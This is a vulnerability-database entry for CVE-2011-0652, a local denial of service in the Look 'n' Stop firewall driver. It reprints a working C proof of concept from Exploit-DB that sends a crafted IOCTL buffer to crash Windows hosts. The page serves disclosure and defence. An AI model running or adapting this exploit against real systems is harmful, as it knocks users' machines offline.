CVE-2011-0652

low

Published 2011-01-28 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

3.1

Description

lnsfw1.sys 6.0.2900.5512 in Look 'n' Stop Firewall 2.06p4 and 2.07 allows local users to cause a denial of service (crash) via a crafted 0x80000064 IOCTL request that triggers an assertion failure. NOTE: some of these details are obtained from third party information.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-16021 dos windows c · 4 KB

Heurs · 2011-01-21

Look n stop - Local Denial of Service

c exploit Source: Exploit-DB

#include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#include <string.h>

/*
Program          : Look 'n' Stop 2.06p4 / 2.07 (6.0.2900.5512)
Homepage         : http://www.looknstop.com
Discovery        : 2009/11/08
Author Contacted : 2010/07/15 ... no reply
Found by         : Heurs
This Advisory    : Heurs
Contact          : s.leberre@sysdream.com


//----- Application description

Look 'n' Stop Firewall 2.07 provides key features to protect your computer
against cyber threats. It prevents malicious programs from transmitting the
data of your computer to hacker's computers. Look 'n' Stop Firewall 2.07
also protects your computer from external intrusions.

//----- Description of vulnerability

lnsfw1.sys driver generate a BSOD with particular value of IOCTL. Kernel wait
an action with a kernel debugger.

//----- Credits

http://www.sysdream.com
http://www.hackinparis.com/
http://ghostsinthestack.org

s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

*/

int __cdecl main(int argc, char* argv[])
{
    HANDLE hDevice = (HANDLE) 0xffffffff;
    DWORD NombreByte;
    DWORD Crashing[] = {
        0x200ff822, 0xd24b37a1, 0x8ce055dc, 0x70b3d269,
        0x3d2ef498, 0xcdd0e57c, 0xf2699fab, 0xed753dcb,
        0xfdde2a99, 0x90590b61, 0x28011112, 0xeb35191c,
        0x36f0e1e7, 0xef7ee764, 0x09b01e1f, 0x0bb86825,
        0x1b886612, 0xd8c289df, 0xaa21ad45, 0x6fa7a76d,
        0x13492a54, 0x7c2bc443, 0x65dbf582, 0xffeb86cc,
        0xf48ca4fd, 0x75542bb5, 0xd05638ba, 0x3876e368,
        0x678ba399, 0x6779f15c, 0x8f89ff55, 0xc8b9cf02,
        0x033b9857, 0x82eef1a9, 0xf0dba3b6, 0xadf5b8f6,
        0x033ef961, 0x393f043b, 0x515896fd, 0x28d10e25,
        0x37b7f707, 0x1a425f92, 0x4bc6acfb, 0x45390605,
        0x0be40107, 0xf121a706, 0x4b4c0e31, 0x88889f12,
        0x0c60806d, 0x03af4569, 0xe5b68798, 0xb22bd966,
        0xd532fe7f, 0x19a7213a, 0x6927f7f5, 0xcd4c3202,
        0x96831f6b, 0x1d09991d, 0x48d1da67, 0x68f24415,
        0xbb01a216, 0xdb6b634a, 0x18e36cb4, 0xcd7265c2,
        0x64b81111, 0x4305d1b3, 0xc4f1ee8d, 0xfcd61343,
        0xb8bfc8b9, 0x8a1a5541, 0xe9c3adcb, 0xca4c2a56,
        0x89a67e7d, 0x74b8704e, 0xfe70e4d6, 0x27612082,
        0xd8e211d7, 0x190ec39c, 0x380dfc09, 0x8d649b0c,
        0xeda15e23, 0xe2e76319, 0xc781f249, 0x4cb25434,
        0xeff3dc6a, 0xa0a6e976, 0x57014474, 0x98629b36,
        0x2cc9fb9d, 0xa6a8b31b, 0xa3fbef44, 0xfeb130d3,
        0x91e8c96b, 0xdc953762, 0x77341f7c, 0xd4ec9d26,
        0x8504a663, 0x1da0406a, 0x8a049adf, 0x0f2ca8ef,
        0xbc93ec1e, 0x027bdfad, 0x4c8885f6, 0x1c30be98,
        0x0ec01493, 0x124d4252, 0x0765f8c1, 0x801652da,
        0x778a6e6a, 0x09ef17aa, 0x6ece13fd, 0xa7280f9c,
        0xcf6235f9, 0xabdeae81, 0x8145979e, 0x45af7871,
        0xed3d36e0, 0x9e223b88, 0xfe26e7f2, 0xe13743f1,
        0xa8171a6e, 0x611c303f, 0x252a68d2, 0xd013e026,
        0x1259b868, 0xf673c420, 0x27a60840, 0xd87eed92,
        0xef872203, 0x26868592, 0x18324bc9, 0xed47e068,
        0xf2c0b162, 0x95966d8e, 0x07cc53db, 0xe8360489,
        0x7c630b42, 0x8ab52dd9, 0xc5bf0c0e, 0xae8a8284,
        0x97a0a5ab, 0x0cccb1c4, 0x4d768275, 0x1101e67e,
        0x16e2f2c3, 0x82b7686a, 0x5b26314e, 0x52f74f38,
        0xcb341107, 0xa59c70d0, 0x3327af19, 0xdd51188f,
        0x54636221, 0xa05f288a, 0xeb7d4a3a, 0x2065885d,
        0xb103190e, 0xd36e7e1e, 0xf7a7d560, 0xc62c828d,
        0x9fc687e9, 0xcf609352, 00e96253
        };
    BYTE Out[0x20];
    
    printf("0day Local DoS - Look 'n' Stop 2.06p4\n\n");
    hDevice = CreateFile("\\\\.\\LNSFW1",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);
    printf("%x\n",hDevice);
    
    DeviceIoControl(hDevice,0x80000064,Crashing,0x28b,0,0,&NombreByte,NULL);
    
    printf("Sploit Send.\n\n");
    CloseHandle(hDevice);
    getch();
    return 0;
}

Application impact

Vendor	Product	Versions	Fixed
looknstop	look_\'n\'_stop_firewall	`2.06`
looknstop	look_\'n\'_stop_firewall	`2.07`

References

CWEs

CWE-20

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.